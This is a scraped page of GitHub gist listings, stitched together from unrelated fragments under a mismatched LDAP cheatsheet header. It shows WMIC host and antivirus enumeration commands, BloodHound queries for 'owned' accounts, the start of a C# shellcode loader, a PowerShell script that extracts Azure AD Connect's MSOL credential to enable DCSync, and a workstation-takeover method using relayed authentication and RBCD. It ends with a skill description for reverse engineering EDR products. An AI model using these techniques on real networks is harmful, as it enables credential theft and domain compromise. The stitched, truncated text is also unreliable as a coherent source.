| title | LDAP Search Filter Cheatsheet |
|---|---|
| author | Jon LaBelle |
| date | January 4, 2021 |
| source | https://jonlabelle.com/snippets/view/markdown/ldap-search-filter-cheatsheet |
| notoc | true |
xorrior
/ wmic_cmds.txt
Last active
April 24, 2026 09:37
Useful Wmic queries for host and domain enumeration
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Host Enumeration: | |
| --- OS Specifics --- | |
| wmic os LIST Full (* To obtain the OS Name, use the "caption" property) | |
| wmic computersystem LIST full | |
| --- Anti-Virus --- | |
| wmic /namespace:\\root\securitycenter2 path antivirusproduct |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "queries": [{ | |
| "name": "List all owned users", | |
| "queryList": [{ | |
| "final": true, | |
| "query": "MATCH (m:User) WHERE m.owned=TRUE RETURN m" | |
| }] | |
| }, | |
| { | |
| "name": "List all owned computers", |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| //Thanks @Arno0x: https://github.com/Arno0x/CSharpScripts/blob/master/shellcodeLauncher.cs | |
| using System; | |
| using System.Runtime.InteropServices; | |
| namespace ShellcodeLoader | |
| { | |
| class Program | |
| { | |
| static void Main(string[] args) | |
| { |
xpn
/ azuread_decrypt_msol_v2.ps1
Last active
February 4, 2026 13:50
Updated method of dumping the MSOL service account (which allows a DCSync) used by Azure AD Connect Sync
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Write-Host "AD Connect Sync Credential Extract v2 (@_xpn_)" | |
| Write-Host "`t[ Updated to support new cryptokey storage method ]`n" | |
| $client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb)\.\ADSync2019;Initial Catalog=ADSync" | |
| try { | |
| $client.Open() | |
| } catch { | |
| Write-Host "[!] Could not connect to localdb..." | |
| return |
jonlabelle
/ ldap_search_filter_cheatsheet.md
Last active
April 29, 2026 08:25
LDAP Search Filter Cheatsheet
gladiatx0r
/ Workstation-Takeover.md
Last active
August 25, 2025 14:06
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure
In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;
- Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
- Relaying that machine authentication to LDAPS for configuring RBCD
- RBCD takeover
The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.
| name | edr-reverse-engineering |
|---|---|
| description | Standardized workflow for reverse engineering endpoint security products, including extraction, decompilation, rule and model recovery, vulnerability analysis, detection gap analysis, proof-of-concept planning, live probes, and stakeholder reports. Use when Claude is asked to analyze an endpoint detection and response product, endpoint protection agent, security sensor, antivirus engine, or similar endpoint security package from installer artifacts, extracted binaries, live systems, or prior workspace outputs. |
Use this skill to run a complete, repeatable reverse-engineering workflow for endpoint security products. Apply the same structure to every product so outputs can be compared across analyses and future work can resume without rediscovery.